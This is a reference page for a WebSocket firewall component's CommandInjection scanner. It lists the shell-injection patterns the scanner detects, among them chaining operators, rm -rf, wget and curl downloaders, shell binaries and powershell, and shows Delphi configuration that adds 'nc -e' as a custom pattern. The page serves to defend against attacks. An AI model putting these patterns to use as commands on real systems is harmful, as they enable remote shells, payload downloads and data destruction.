TsgcWebSocketFirewall › Properties › CommandInjection
Scans inbound messages for shell command injection patterns and denies, allows or logs them according to Action.
property CommandInjection: TsgcFirewallCommandInjection read FCommandInjection write SetCommandInjection;—
Enable CommandInjection.Enabled to run the built-in scanner for shell-injection patterns. It recognises chaining operators (;, |, &&, ||), backtick and $(...) execution, destructive commands (rm -rf), remote downloaders (wget, curl), Unix shells (/bin/sh, /bin/bash), cmd.exe and powershell. Extra expressions can be supplied through CustomPatterns. Action controls the response: faDeny rejects the message, faAllow forwards it and faLog only fires OnViolation with type fvCommandInjection. Matches feed ThreatScore through WeightCommandInjection. Defaults: Action=faDeny.
sgcWebSocketFirewall1.CommandInjection.Enabled := True;
sgcWebSocketFirewall1.CommandInjection.Action := faDeny;
sgcWebSocketFirewall1.CommandInjection.CustomPatterns.Add('nc -e');